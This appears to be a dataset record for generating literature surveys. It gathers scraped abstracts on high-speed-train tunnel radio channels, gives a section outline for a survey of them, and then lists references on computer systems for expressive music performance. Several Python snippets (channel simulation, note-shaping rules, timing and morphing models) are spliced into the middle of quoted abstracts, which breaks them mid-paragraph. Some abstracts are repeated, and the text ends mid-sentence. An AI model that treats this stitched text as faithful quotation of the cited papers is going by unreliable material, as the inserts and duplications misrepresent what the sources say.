VTV channel measurement campaigns in a variety of important environments, and the channel characteristics (such as delay spreads and Doppler spreads) therein. We also describe the most commonly used channel modeling approaches for VTV channels: statistical as well as geometry-based channel models have been developed based on measurements and intuitive insights. Extensive references are provided. --- paper_title: Vehicle-to-vehicle channel modeling and measurements: recent advances and future challenges paper_content: Vehicle-to-vehicle communications have recently received much attention due to some new applications, such as wireless mobile ad hoc networks, relay-based cellular networks, and intelligent transportation systems for dedicated short range communications. The underlying V2V channels, as a foundation for the understanding and design of V2V communication systems, have not yet been sufficiently investigated. This article aims to review the state-of-the-art in V2V channel measurements and modeling. Some important V2V channel measurement campaigns and models are briefly described and classified. Finally, some challenges of V2V channel measurements and modeling are addressed for future studies. --- paper_title: 3D non-stationary wideband circular tunnel channel models for high-speed train wireless communication systems paper_content: This paper proposes three-dimensional (3D) non-stationary wideband circular geometry-based stochastic models (GBSMs) for high-speed train (HST) tunnel scenarios. Considering single-bounced (SB) and multiple-bounced (MB) components from the tunnel's internal surfaces, a theoretical channel model is first established. 
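A finite-state Markov channel of the kind described above reduces to a state set (for example SNR intervals estimated per location bin) plus a transition matrix. The three-state example below uses invented numbers purely to show the simulation mechanics.

```python
import numpy as np

rng = np.random.default_rng(1)

# Hypothetical 3-state FSMC: the transition matrix and per-state mean SNRs are
# made up for illustration, not taken from the cited measurements.
P = np.array([[0.90, 0.10, 0.00],
              [0.05, 0.90, 0.05],
              [0.00, 0.10, 0.90]])
mean_snr_db = np.array([5.0, 15.0, 25.0])

def simulate_fsmc(n_steps, start_state=1):
    states = np.empty(n_steps, dtype=int)
    s = start_state
    for k in range(n_steps):
        states[k] = s
        s = rng.choice(3, p=P[s])            # next state drawn from row s
    return states, mean_snr_db[states]

states, snr = simulate_fsmc(20)
print(states)
print(snr)
```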
Then, the corresponding simulation model is developed using the method of equal volume (MEV) to calculate discrete angular parameters. Based on the proposed 3D GBSMs, important time-variant statistical properties are investigated, such as the temporal autocorrelation function (ACF), spatial cross-correlation function (CCF), and space-Doppler (SD) power spectrum density (PSD). Results indicate that all statistical properties of the simulation model, verified by simulation results, can match well those of the theoretical model. The statistical properties of the proposed 3D GBSMs are further validated by relevant measurement data, demonstrating the flexibility and utility of our proposed tunnel GBSMs. --- paper_title: GBSB MODEL for MIMO Channel AND its Space-time CORRELATION Analysis in Tunnel paper_content: Aiming at the special space in the tunnel, this paper assumes the geometric distribution of scatterers which is totally different from on the ground, puts forward a new GBSB model of MIMO channel and deduces the space-time correlation function of the model. The results of theoretical analysis and simulation show that the model can more accurately reflect the factors which impact the channel correlation in the tunnel. --- paper_title: Communication in tunnel: Channel characteristics and performance of diversity schemes paper_content: This paper gives an overview of the theoretical and experimental approach which has been carried out in order to study the narrow band and wideband channel characteristics in a straight semi-arched tunnel. To improve the reliability of the link in terms of bit error rate and/or channel capacity, Multiple Input Multiple Output (MIMO) techniques have been proposed. Usually the efficiency of MIMO techniques is often compared to the performances of a Single Input Single Output (SISO) system, chosen as a reference. In this presentation, other diversity schemes at the receiving side as selection combining and maximum ratio combining are also considered since they have an easier implantation. --- paper_title: Wireless Communication for Heavy Haul Railway Tunnels Based on Distributed Antenna Systems paper_content: Radio-over-fiber (RoF) technology can improve reliability and quality of service (QoS) of railway communication systems effectively. This paper studies directional antenna radiating same direction and intercross base station redundant network these two coverage strategies of RoF in long heavy haul railway tunnels (more than 1 km). As RAUs (remote antenna unit) deployed in long tunnels, according to different coverage strategies, the number of RAUs is different, this will lead various handover mechanisms. Based on the channel modeling of simulator in this paper, coverage efficiency (power consumption of unit distance in tunnel) handover trigger probability and outage probability are adopted to compare the performance of these two coverage strategies. It can be concluded that when using directional antenna radiating same direction, due to the longer radiate distance R, it has better coverage efficiency, and the trigger probability almost reached 100% once entered the overlapping area, and the handover outage probability is clearly lower than using intercross base station antenna network, even if the train is fast. ---
Title: Channel measurements and models for high-speed train wireless communication systems in tunnel scenarios: a survey
Section 1: Introduction
Description 1: Introduce the importance of HST wireless communication systems in tunnel scenarios and provide an overview of the paper.
Section 2: HST channel measurements in tunnel scenarios
Description 2: Review and classify recent HST tunnel channel measurements based on various parameters and statistics.
Section 3: Measurement setup
Description 3: Discuss details of the setups used in HST tunnel channel measurements, including antenna configurations and frequency bands.
Section 4: Large-scale vs. small-scale fading
Description 4: Explain large-scale and small-scale fading characteristics in HST tunnel scenarios.
Section 5: Far region vs. near region inside tunnel
Description 5: Describe the differentiation between far and near regions inside tunnels and their impact on channel characteristics.
Section 6: Typical propagation zones
Description 6: Discuss the different propagation zones in tunnels and how they affect propagation characteristics.
Section 7: Parameters influencing radio propagation inside tunnel
Description 7: Outline various parameters, such as tunnel size and shape, that affect radio propagation in tunnels.
Section 8: HST channel models in tunnel scenarios
Description 8: Present an overview of different HST tunnel channel models discussed in the literature.
Section 9: Network architectures for tunnels
Description 9: Discuss possible network architectures for providing wireless coverage inside tunnels.
Section 10: Modeling approaches of HST tunnel channel models
Description 10: Explain various modeling approaches for HST tunnel channel models, such as deterministic, stochastic, and hybrid models.
Section 11: Research directions in HST tunnel channel measurements and models
Description 11: Discuss future research directions in HST tunnel channel measurements and modeling.
Section 12: Conclusion
Description 12: Summarize the key points of the survey and highlight the importance of future work.
A survey of computer systems for expressive music performance
38
--- paper_title: A Composer's Introduction to Computer Music. paper_content: Abstract A historical survey of computer music is presented. As the title suggests, this survey is written for the composer, in order to facilitate his access to the tools currently offered by technology. Approaches both to computer composition and to sound synthesis techniques are considered. These are discussed in terms of their music-theoretical implications, modes of man-machine communication, and hardware configurations. Under computer composition, the various degrees to which a digital computer can participate in the compositional process are discussed. As regards sound synthesis, both digital and hybrid techniques are considered. Throughout, the presentation is based on a discussion of specific systems, which provide a historical review of the field. In addition, extensive references are made to the existing literature, in order to direct the reader to additional information. --- paper_title: Musical performance. A synthesis-by-rule approach paper_content: The general purpose of the present paper is to demonstrate some effects on the musical acceptability of a performance of a melody, which may be achieved by means of a synthesis-by-rule strategy. Both the structure of a melody and the playing technique of the performer seem important to the music perception and musical performance quality. The synthesis equipment used here consists of a computer-controlled synthesizer. The input is the melody written in ordinary notation, and optionally complemented with phrase markers. This is the input material to a text-to-speech conversion program [Carlson and Granstrom, in Speech Communication II, edited by G. Fant (Stockholm, 1975), pp. 245-253] now adapted for notation-to-music conversion. Some of the rules relating the performance to the structure operate on a phrase level, and other rules operate on sequences of two or three notes only. As regards production aspects, the influence of a raising of the larynx in singing on the perceived musical quality of the perfo... --- paper_title: Composing Music with Computers paper_content: Foreword by Daniel V. Oppenheim Preface Computer music: facing the facts Preparing the ground Probabilities, grammars and automata Iterative algorithms: chaos and fractals Neural computation and music Evolutionary music: breaking new ground Case studies Music composition software on the CD-ROM Epilogue Appendix 1: Excerpt of J. S. Bach's Choral BWV 668 Appendix 2: Musical clip Appendix 3: Formant chart Appendix 4: A primer in Lisp programming References CD-ROM Instructions --- paper_title: The Computer Music Tutorial paper_content: From the Publisher: ::: The Computer Music Tutorial is a comprehensive text and reference that covers all aspects of computer music, including digital audio, synthesis techniques, signal processing, musical input devices, performance software, editing systems, algorithmic composition, MIDI, synthesizer architecture, system interconnection, and psychoacoustics. A special effort has been made to impart an appreciation for the rich history behind current activities in the field. ::: Profusely illustrated and exhaustively referenced and cross-referenced, The Computer Music Tutorial provides a step-by-step introduction to the entire field of computer music techniques. Written for nontechnical as well as technical readers, it uses hundreds of charts, diagrams, screen images, and photographs as well as clear explanations to present basic concepts and terms.
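To make the synthesis-by-rule idea from the performance reference earlier in this entry concrete, the sketch below applies two invented note-level rules (phrase-final lengthening and a small emphasis on ascending steps) to a toy note list. Neither rule nor its magnitude is taken from the cited work.

```python
# Toy "synthesis-by-rule" pass: nominal note durations (s) and a phrase-boundary flag
# go in, slightly humanized durations and MIDI-style velocities come out.
notes = [
    {"pitch": 60, "dur": 0.5, "phrase_end": False},
    {"pitch": 62, "dur": 0.5, "phrase_end": False},
    {"pitch": 64, "dur": 0.5, "phrase_end": True},
]

def apply_rules(notes, base_velocity=64):
    out = []
    for i, n in enumerate(notes):
        dur = n["dur"]
        vel = base_velocity
        if n["phrase_end"]:
            dur *= 1.2                      # rule 1: lengthen phrase-final notes
        if i > 0 and n["pitch"] > notes[i - 1]["pitch"]:
            vel += 4                        # rule 2: slight emphasis on ascending steps
        out.append({"pitch": n["pitch"], "dur": round(dur, 3), "vel": vel})
    return out

print(apply_rules(notes))
```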
Mathematical notation and program code examples are used only when absolutely necessary. Explanations are not tied to any specific software or hardware. ::: Curtis Roads has served as editor-in-chief of Computer Music Journal for more than a decade and is a recognized authority in the field. The material in this book was compiled and refined over a period of several years of teaching in classes at Harvard University, Oberlin Conservatory, the University of Naples, IRCAM, Les Ateliers UPIC, and in seminars and workshops in North America, Europe, and Asia. --- paper_title: Emotional Expression in Music Performance: Between the Performer's Intention and the Listener's Experience: paper_content: Nine professional musicians were instructed to perform short melodies using various instruments - the violin, electric guitar, flute, and singing voice - so as to communicate specific emotional characters to listeners. The performances were first validated by having listeners rating the emotional expression and then analysed with regard to their physical characteristics, e.g. tempo, dynamics, timing, and spectrum. The main findings were that (a) the performer's expressive intention had a marked effect on all analysed variables; (b) the performers showed many similarities as well as individual differences in emotion encoding; (c) listeners were generally successful in decoding the intended expression; and (d) some emotional characters seemed easier to communicate than others. The reported results imply that we are unlikely to find performance rules independent of instrument, musical style, performer, or listener. --- paper_title: Does music performance allude to locomotion? A model of final ritardandi derived from measurements of stopping runners paper_content: This investigation explores the common assumption that music and motion are closely related by comparing the stopping of running and the termination of a piece of music. Video recordings were made ... --- paper_title: Music performance research at the millennium paper_content: Empirical research on music performance has increased considerably during recent decades. This article updates the review of the research up to 1995 published by the current author in 1999. Covering about 200 papers from 1995 up to 2002, this article confirms the impression that music performance research is in a very active stage. As in the previous review, the majority of papers are on measurement of performance, but there is a rapidly increasing number of contributions concerning models of performance, performance planning and practice. Although fewer in number, there are also many new contributions within each of the remaining areas of performance research analysed in this review. --- paper_title: Five Facets of Musical Expression: A Psychologist's Perspective on Music Performance paper_content: The aim of this article is to outline a psychological approach to expression in music performance that could help to provide a solid foundation for the teaching of expressive skills in music education. 
Drawing on previous research, the author suggests that performance expression is best conceptualized as a multi-dimensional phenomenon consisting of five primary components: (a) Generative rules that function to clarify the musical structure; (b) Emotional expression that serves to convey intended emotions to listeners; (c) Random variations that reflect human limitations with regard to internal time-keeper variance and motor delays; (d) Motion principles that prescribe that some aspects of the performance (e.g. timing) should be shaped in accordance with patterns of biological motion; and (e) Stylistic unexpectedness that involves local deviations from performance conventions. An analysis of performance expression in terms of these five components - collectively referred to as the GERMS model - has importa... --- paper_title: Music performance research at the millennium paper_content: Empirical research on music performance has increased considerably during recent decades. This article updates the review of the research up to 1995 published by the current author in 1999. Covering about 200 papers from 1995 up to 2002, this article confirms the impression that music performance research is in a very active stage. As in the previous review, the majority of papers are on measurement of performance, but there is a rapidly increasing number of contributions concerning models of performance, performance planning and practice. Although fewer in number, there are also many new contributions within each of the remaining areas of performance research analysed in this review. --- paper_title: The Computer Music Tutorial paper_content: From the Publisher: ::: The Computer Music Tutorial is a comprehensive text and reference that covers all aspects of computer music, including digital audio, synthesis techniques, signal processing, musical input devices, performance software, editing systems, algorithmic composition, MIDI, synthesizer architecture, system interconnection, and psychoacoustics. A special effort has been made to impart an appreciation for the rich history behind current activities in the field. ::: Profusely illustrated and exhaustively referenced and cross-referenced, The Computer Music Tutorial provides a step-by-step introduction to the entire field of computer music techniques. Written for nontechnical as well as technical readers, it uses hundreds of charts, diagrams, screen images, and photographs as well as clear explanations to present basic concepts and terms. Mathematical notation and program code examples are used only when absolutely necessary. Explanations are not tied to any specific software or hardware. ::: Curtis Roads has served as editor-in-chief of Computer Music Journal for more than a decade and is a recognized authority in the field. The material in this book was compiled and refined over a period of several years of teaching in classes at Harvard University, Oberlin Conservatory, the University of Naples, IRCAM, Les Ateliers UPIC, and in seminars and workshops in North America, Europe, and Asia. --- paper_title: The Analysis and Cognition of Basic Melodic Structures: The Implication-Realization Model paper_content: Eugene Narmour formulates a comprehensive theory of melodic syntax to explain cognitive relations between melodic tones at their most basic level. Expanding on the theories of Leonard B. Meyer, the author develops one parsimonious, scaled set of rules modeling implication and realization in all the primary parameters of music. 
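The GERMS decomposition quoted above treats expressive timing as the combined effect of several sources. The sketch below mimics only that combined structure, with invented curves for structural shaping, emotional tempo scaling, a motion-like final ritardando and random timekeeper jitter.

```python
import numpy as np

rng = np.random.default_rng(2)

def germs_like_timing(nominal_ioi, phrase_pos, emotion_tempo_scale=1.05, jitter_sd=0.01):
    """Combine several deviation sources into one inter-onset interval (IOI) sequence.

    All curves and magnitudes here are placeholders used only to show the structure.
    """
    ioi = np.asarray(nominal_ioi, dtype=float)
    structure = 1.0 + 0.08 * phrase_pos**2                 # slow down toward phrase end
    ritard = 1.0 + 0.3 * np.linspace(0, 1, ioi.size) ** 2  # motion-like final ritardando
    jitter = rng.normal(1.0, jitter_sd, ioi.size)          # timekeeper/motor noise
    return ioi * structure * emotion_tempo_scale * ritard * jitter

pos = np.linspace(0.0, 1.0, 8)                             # position within the phrase
print(np.round(germs_like_timing(np.full(8, 0.5), pos), 3))
```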
Through an elaborate and original analytic symbology, he shows that a kind of "genetic code" governs the perception and cognition of melody. One is an automatic, "brute" system operating on stylistic primitives from the bottom up. The other constitutes a learned system of schemata impinging on style structures from the top down. The theoretical constants Narmour uses are context-free and, therefore, applicable to all styles of melody. He places considerable emphasis on the listener's cognitive performance (that is, fundamental melodic perception as opposed to acquired musical competence). He concentrates almost exclusively on low-level, note-to-note relations. The result is a highly generalized theory useful in researching all manner of psychological and music-theoretic problems concerned with the analysis and cognition of melody. "In this innovative, landmark book, a distinguished music theorist draws extensively from a variety of disciplines, in particular from cognitive psychology and music theory, to develop an elegant and persuasive framework for the understanding of melody. This book should be read by all scholars with a serious interest in music."--Diana Deutsch, Editor, Music Perception --- paper_title: Artificial neural networks based models for automatic performance of musical scores paper_content: This article briefly summarises the author's research on automatic performance, started at CSC (Centro di Sonologia Computazionale, University of Padua) and continued at TMH-KTH (Speech, Music Hear ... --- paper_title: Composing Music by Composing Rules: Design and Usage of a Generic Music Constraint System paper_content: This research presents the design, usage, and evaluation of a highly generic music constraint system called Strasheela. Strasheela simplifies the definition of musical constraint satisfaction problems (CSP) by predefining building blocks required for such problems. At the same time, Strasheela preserves a high degree of generality and is reasonably efficient. Strasheela is highly generic, because it is highly programmable. In particular, three fundamental components are more programmable in Strasheela compared with existing music constraint systems: the music representation, the rule application mechanism, and the search process. Strasheela features an expressive symbolic music representation. This representation supports explicitly storing score information by sets of score objects, their attributes, and their hierarchic nesting. Any information available in the score is accessible from any object in the score and can be used to obtain derived information. The representation is complemented by the notion of variables: score information can be unknown and such information can be constrained. This research proposes a rule formalism which combines convenience and full user control to express which score variable sets are constrained by a given rule. A rule is a first-class function. A rule application mechanism is a higher-order function. A rule application mechanism traverses the score in order to apply a given rule to variable sets. This text presents rule application mechanisms suitable for a large set of musical CSPs and reproduces important mechanisms of existing systems. Strasheela is founded on a constraint programming model which makes the search process programmable at a high-level. 
The Strasheela user can optimise the search for a particular constraint satisfaction problem by programming a distribution strategy (a dynamic variable and value ordering) independent of the problem definition. Special distribution strategies for efficiently solving various musical CSPs – including complex polyphonic problems – are presented. --- paper_title: Rencon 2004: Turing Test for Musical Expression paper_content: Rencon is an annual international event that started in 2002. It has roles of (1) pursuing evaluation methods for systems whose output includes subjective issues, and (2) providing a forum for researches of several fields related to musical expression. In the past. Rencon was held as a workshop associated with a musical contest that provided a forum for presenting and discussing the latest research in automatic performance rendering. This year we introduce new evaluation methods of performance expression to Rencon: a Turing Test and a Gnirut Test, which is a reverse Turing Test, for performance expression. We have opened a section of the contests to any instruments and genre of music, including synthesized human voices. --- paper_title: Emotional Expression in Music Performance: Between the Performer's Intention and the Listener's Experience: paper_content: Nine professional musicians were instructed to perform short melodies using various instruments - the violin, electric guitar, flute, and singing voice - so as to communicate specific emotional characters to listeners. The performances were first validated by having listeners rating the emotional expression and then analysed with regard to their physical characteristics, e.g. tempo, dynamics, timing, and spectrum. The main findings were that (a) the performer's expressive intention had a marked effect on all analysed variables; (b) the performers showed many similarities as well as individual differences in emotion encoding; (c) listeners were generally successful in decoding the intended expression; and (d) some emotional characters seemed easier to communicate than others. The reported results imply that we are unlikely to find performance rules independent of instrument, musical style, performer, or listener. --- paper_title: OVERVIEW OF THE KTH RULE SYSTEM FOR MUSICAL PERFORMANCE paper_content: The KTH rule system models performance principles used by musicians when performing a musical score, within the realm of Western classical, jazz and popular music. An overview is given of the major rules involving phrasing, micro-level timing, metrical patterns and grooves, articulation, tonal tension, intonation, ensemble timing, and performance noise. By using selections of rules and rule quantities, semantic descriptions such as emotional expressions can be modeled. A recent real-time implementation provides the means for controlling the expressive character of the music. The communicative purpose and meaning of the resulting performance variations are discussed as well as limitations and future improvements. --- paper_title: Emotional Coloring of Computer-Controlled Music Performances paper_content: This dissertation presents research in the field ofautomatic music performance with a special focus on piano. A system is proposed for automatic music performance, basedon artificial neural networks (ANNs). A complex,ecological-predictive ANN was designed thatlistensto the last played note,predictsthe performance of the next note,looksthree notes ahead in the score, and plays thecurrent tone. 
This system was able to learn a professionalpianist's performance style at the structural micro-level. In alistening test, performances by the ANN were judged clearlybetter than deadpan performances and slightly better thanperformances obtained with generative rules. The behavior of an ANN was compared with that of a symbolicrule system with respect to musical punctuation at themicro-level. The rule system mostly gave better results, butsome segmentation principles of an expert musician were onlygeneralized by the ANN. Measurements of professional pianists' performances revealedinteresting properties in the articulation of notes markedstaccatoandlegatoin the score. Performances were recorded on agrand piano connected to a computer.Staccatowas realized by a micropause of about 60% ofthe inter-onset-interval (IOI) whilelegatowas realized by keeping two keys depressedsimultaneously; the relative key overlap time was dependent ofIOI: the larger the IOI, the shorter the relative overlap. Themagnitudes of these effects changed with the pianists' coloringof their performances and with the pitch contour. Theseregularities were modeled in a set of rules for articulation inautomatic piano music performance. Emotional coloring of performances was realized by means ofmacro-rules implemented in the Director Musices performancesystem. These macro-rules are groups of rules that werecombined such that they reflected previous observations onmusical expression of specific emotions. Six emotions weresimulated. A listening test revealed that listeners were ableto recognize the intended emotional colorings. In addition, some possible future applications are discussedin the fields of automatic music performance, music education,automatic music analysis, virtual reality and soundsynthesis. --- paper_title: Musical performance. A synthesis‐by‐rule approach paper_content: The general purpose of the present paper is to demonstrate some effects on the musical acceptability of a performance of a melody, which may be achieved by means of a synthesis‐by‐rule strategy. Both the structure of a melody and the playing technique of the performer seem important to the music perception and musical performance quality. The synthesis equipment used here consists of a computer controlled synthesizer. The input is the melody written in ordinary notation, and optionally complemented with phrase markers. This is the input material to a text‐to‐speech conversion program [Carlson and Granstrom, in Speech Communication II. edited by G. Fant (Stockholm, 1975) pp. 245‐253] now adapted to for notation‐to‐music conversion. Some of the rules relating the performance to the structure operate on a phase level, and other rules operate on sequences of two or three notes only. As regar‐s production aspects, the influence of a raising of the larynx in singing on the perceived musical quality of the perfo... --- paper_title: Attempts to Reproduce a Pianist?s Expressive Timing with Director Musices Performance Rules paper_content: The Director Musices generative grammar of music performance is a system of context dependent rules that automatically introduces expressive deviation in performances of input score files. A number ... 
--- paper_title: Real and Simulated Expression: A Listening Study paper_content: A number of attempts have been made in the past 10 to 15 years to construct artificial systems that can simulate human expressive performance, but few systematic studies of the relationship between model output and comparable human performances have been undertaken. In this study, we assessed listeners' responses to real and artificially generated performances. Subjects were asked to identify and evaluate performances of two differently notated editions of two pieces, played by a panel of experienced pianists and by an artificial performer. The results suggest that expressive timing and dynamics do not relate to one another in the simple manner that is implemented in the model (Todd, 1992) used here, that small objective differences in the expressive profiles of different performances can lead to distinctly different judgments by listeners, and that what appears to be the same expressive feature in performance can fulfill different functions. Although one purpose of such a study is to assess the model on which it is based, more important is its demonstration of the general value of comparing human data with a model. As is often the case, it is what the model does not explain that is most interesting. --- paper_title: Composer-Specific Aspects of Musical Performance: An Evaluation of Clynes's Theory of Pulse for Performances of Mozart and Beethoven paper_content: This report examines Clynes’s theory of “pulse” for performances of music by Mozart and Beethoven (e.g., Clynes, 1983, 1987). In three experiments that used a total of seven different compositions, an analysis-bysynthesis approach was used to examine the repetitive patterns of timing and loudness thought to be associated with performances of Mozart and Beethoven. Across performances, judgments by trained musicians provided support for some of the basic claims made by Clynes. However, judgments of individual performances were not always consistent with predictions. In Experiment 1, melodies were judged to be more musical if they were played with the pulse than if they were played with an altered version of the pulse or if they were played without expression. In Experiment 2, listeners were asked to judge whether performances of Mozart were “Mozartian” and whether performances of Beethoven were “Beethovenian.” Ratings were highest if the pulse of the composer was implemented, and significantly lower if the pulse of another composer was implemented (e.g., the Mozart pulse in the Beethoven piece) in all or part of each piece. In Experiment 3, a Beethoven piece was played with each of three pulses: Beethoven, Haydn, and Schubert. Listeners judged the version with the Beethoven pulse as most Beethovenian, but the version with the Haydn pulse as most “musical.” Although the overall results were encouraging, it is suggested that there are significant difficulties in evaluating Clynes’s theory and that much more research is needed before his ideas can be assessed adequately. The need for clarification of some theoretical issues surrounding the concept of pulse is emphasized. --- paper_title: Tempo Curves Revisited: Hierarchies of Performance Fields paper_content: In this article, we present a new view of the still-controversial phenomenon of musical tempo. Our perspective is guided by the ongoing development of a general theory of performance, together with its implementation as a performance workstation on the NeXTSTEP programming environment (Mazzola 1993). 
The main result of this approach is a formalism for the description of musical performance based on local and global hierarchies of particular vector fields. These performance fields are superimposed on the given musical score as a separate performance score and describe the guiding structure of the physical performance. As a special and concrete application of this general result, we expose the stratification of tempo into hierarchies of local tempo curves, connected to each other by systematic synchroneity relations. The theoretical material has been implemented in the MIDI software Presto version 2.0. This performance and composition tool enabled us to experiment with and to verify the practical use of the theoretical constructs. It was written in ANSI C by M. Waldvogel et al. and has a source code length of 110,000 words. It is available on Atari and Macintosh computers. --- paper_title: Generative Principles of Musical Thought Integration of Microstructure with Structure. paper_content: We shall describe recently discovered generative principles of musical thought which unify musical microstructure with structure, giving rise to musical integrity (Clynes, 1983, 1985, 1986). These principles appear to describe fundamental aspects of musical thought and are predictive in nature. They show how microstructure unfolds naturally from moment to moment, guided by structure. Their function is not conscious but is systematic; not explicit but secure. Since they may be used in musical synthesis itis readily shown that they can correctly model integral aspects of musical thought and provide good interpretations. (See footnote 1) We are here concerned about what these principles can tell us about musical thought and about thought itself. Musical thought is a particular kind of thought. It has much in common with non-musical thought and also much that is specific. Non-musical thought involves verbal language and/or non-verbal processes; it is clearly possible to a considerable degree to think without language. Does it make sense to ask what is left of musical thought if one removes musical language from it? In both musical as in non-musical thought, the largest portions of its processes are not conscious, and so this question involves unconsciously operating generative grammars. Evidence for this grammar is found in musical microstructure. --- paper_title: Toward an expert system for expressive musical performance paper_content: The development and implementation of an expert system that determines the tempo and articulations of Bach fugues are described. The rules in the knowledge base are based on the expertise of two professional performers. The system's input is a numeric representation of the fugue. The system processes the input using a transition graph, a data structure consisting of nodes where data is stored and edges that connect the nodes. The transition graph recognizes rhythmic patterns in the input. Once the system identifies a pattern, it applies a specific rule or performs a procedure. System output consists of a listing of tempo and articulation instructions. To validate the expert system, its output was compared with versions of fugues edited by one of the two experts used in developing the system. In tests with six fugues, the expert system generated the same editing instructions 85 to 90% of the time. 
> --- paper_title: jPop-E: an assistant system for performance rendering of ensemble music paper_content: This paper introduces jPop-E (java-based PolyPhrase Ensemble), an assistant system for the Pop-E performance rendering system. Using this assistant system, MIDI data including expressive tempo changes or velocity control can be created based on the user's musical intention. Pop-E (PolyPhrase Ensemble) is one of the few machine systems devoted to creating expressive musical performances that can deal with the structure of polyphonic music and the user's interpretation of the music. A well-designed graphical user interface is required to make full use of the potential ability of Pop-E. In this paper, we discuss the necessary elements of the user interface for Pop-E, and describe the implemented system, jPop-E. --- paper_title: Controlling musical emotionality: an affective computational architecture for influencing musical emotions paper_content: Emotions are a key part of creative endeavours, and a core problem for computational models of creativity. In this paper we discuss an affective computing architecture for the dynamic modification of music with a view to predictably affecting induced musical emotions. Extending previous work on the modification of perceived emotions in music, our system architecture aims to provide reliable control of both perceived and induced musical emotions: its emotionality. A rule-based system is used to modify a subset of musical features at two processing levels, namely score and performance. The interactive model leverages sensed listener affect by adapting the emotionality of the music modifications in real-time to assist the listener in reaching a desired emotional state. --- paper_title: Expression extraction in virtuoso music performances paper_content: An approach to music interpretation by computers is discussed. A rule-based music interpretation system is being developed that generates sophisticated performance from a printed music score. The authors describe the function of learning how to play music, which is the most important process in music interpretation. The target to be learned is expression rules and grouping strategy: expression rules are used to convert dynamic marks and motives into concrete performance data, and grouping strategy is used to extract motives from sequences of notes. They are learned from a given virtuoso performance. The delicate control of attack timing and of the duration and strength of the notes is extracted by the music transcription function. The performance rules are learned by investigating how the same or similar musical primitives are played in a performance. As for the grouping strategy, the system analyzes how the player grouped music and registers dominant note sequences to extract motives. > --- paper_title: The Analysis and Cognition of Basic Melodic Structures: The Implication-Realization Model paper_content: Eugene Narmour formulates a comprehensive theory of melodic syntax to explain cognitive relations between melodic tones at their most basic level. Expanding on the theories of Leonard B. Meyer, the author develops one parsimonious, scaled set of rules modeling implication and realization in all the primary parameters of music. Through an elaborate and original analytic symbology, he shows that a kind of "genetic code" governs the perception and cognition of melody. One is an automatic, "brute" system operating on stylistic primitives from the bottom up. 
The other constitutes a learned system of schemata impinging on style structures from the top down. The theoretical constants Narmour uses are context-free and, therefore, applicable to all styles of melody. He places considerable emphasis on the listener's cognitive performance (that is, fundamental melodic perception as opposed to acquired musical competence). He concentrates almost exclusively on low-level, note-to-note relations. The result is a highly generalized theory useful in researching all manner of psychological and music-theoretic problems concerned with the analysis and cognition of melody. "In this innovative, landmark book, a distinguished music theorist draws extensively from a variety of disciplines, in particular from cognitive psychology and music theory, to develop an elegant and persuasive framework for the understanding of melody. This book should be read by all scholars with a serious interest in music."--Diana Deutsch, Editor, Music Perception --- paper_title: Modeling and control of expressiveness in music performance paper_content: Expression is an important aspect of music performance. It is the added value of a performance and is part of the reason that music is interesting to listen to and sounds alive. Understanding and modeling expressive content communication is important for many engineering applications in information technology. For example, in multimedia products, textual information is enriched by means of graphical and audio objects. In this paper, we present an original approach to modify the expressive content of a performance in a gradual way, both at the symbolic and signal levels. To this purpose, we discuss a model that applies a smooth morphing among performances with different expressive content, adapting the audio expressive character to the user's desires. Morphing can be realized with a wide range of graduality (from abrupt to very smooth), allowing adaptation of the system to different situations. The sound rendering is obtained by interfacing the expressiveness model with a dedicated postprocessing environment, which allows for the transformation of the event cues. The processing is based on the organized control of basic audio effects. Among the basic effects used, an original method for the spectral processing of audio is introduced. --- paper_title: An Abstract Control Space for Communication of Sensory Expressive Intentions in Music Performance paper_content: Expressiveness is not an extravagance: instead, expressiveness plays a critical role in rational decision-making, in perception, in human interaction, in human emotions and in human intelligence. These facts, combined with the development of new informatics systems able to recognize and understand different kinds of signals, open new areas for research. A new model is suggested for computer understanding of sensory expressive intentions of a human performer and both theoretical and practical applications are described for human-computer interaction, perceptual information retrieval, creative arts and entertainment. Recent studies demonstrated that by opportunely modifying systematic deviations introduced by the musician it is possible to convey different sensitive contents, such as expressive intentions and/or emotions. We present an space, that can be used as a user interface. It represents, at an abstract level, the expressive content and the interaction between the performer and an expressive synthesizer. 
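The control-space idea above lends itself to a small illustration. The following sketch assumes a unit-square control space with four invented corner "intentions" and simple bilinear blending of rendering parameters; it is a toy reconstruction of the general idea, not the published model.

```python
# Hypothetical sketch of a two-dimensional expressive control space in the spirit
# of the abstract-control-space / morphing work above. Corner profiles and axis
# meanings are illustrative assumptions, not the published parameterization.

# Each corner of the unit square holds an expressive profile:
# (tempo_factor, loudness_factor, legato_amount in [0, 1]).
CORNERS = {
    (0, 0): (0.85, 0.7, 0.9),   # e.g. a "soft / dark" intention
    (1, 0): (1.15, 1.2, 0.2),   # e.g. a "bright / hard" intention
    (0, 1): (0.95, 0.9, 0.7),
    (1, 1): (1.10, 1.1, 0.4),
}

def morph(x, y):
    """Bilinearly blend the corner profiles at point (x, y) in the unit square."""
    weights = {
        (0, 0): (1 - x) * (1 - y),
        (1, 0): x * (1 - y),
        (0, 1): (1 - x) * y,
        (1, 1): x * y,
    }
    blended = [0.0, 0.0, 0.0]
    for corner, w in weights.items():
        for k, value in enumerate(CORNERS[corner]):
            blended[k] += w * value
    return tuple(blended)

# Moving the control point smoothly morphs the rendering parameters.
print(morph(0.0, 0.0))  # exactly the "soft / dark" profile
print(morph(0.5, 0.5))  # an even blend of all four intentions
```

Because the blend changes continuously with the control point, the same mechanism supports anything from abrupt switches to very smooth morphing between expressive intentions.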
--- paper_title: Audio Morphing Different Expressive Intentions for Multimedia Systems paper_content: Web Extras: Sample audio files and view a demo of the audio authoring tool.Download Real Jukebox for listening to the mp3 filesSonatina in sol (by Beethoven) played neutral (without any expressive intentions)Expressive performance of Sonatina in sol generated by the model in a symbolic way (that is, as a MIDI file)Sonata K545 (by Mozart) played neutral (without any expressive intentions)Expressive performance of Sonata K545 generated by the model in a symbolic way (that is, as a MIDI file)Expressive performance of Sonata in A Major Op. V(by Corelli) generated by the audio authoring tool (using the audio postprocessing tool) --- paper_title: Artificial neural networks based models for automatic performance of musical scores paper_content: This article briefly summarises the author's research on automatic performance, started at CSC (Centro di Sonologia Computazionale, University of Padua) and continued at TMH-KTH (Speech, Music Hear ... --- paper_title: The Analysis and Cognition of Basic Melodic Structures: The Implication-Realization Model paper_content: Eugene Narmour formulates a comprehensive theory of melodic syntax to explain cognitive relations between melodic tones at their most basic level. Expanding on the theories of Leonard B. Meyer, the author develops one parsimonious, scaled set of rules modeling implication and realization in all the primary parameters of music. Through an elaborate and original analytic symbology, he shows that a kind of "genetic code" governs the perception and cognition of melody. One is an automatic, "brute" system operating on stylistic primitives from the bottom up. The other constitutes a learned system of schemata impinging on style structures from the top 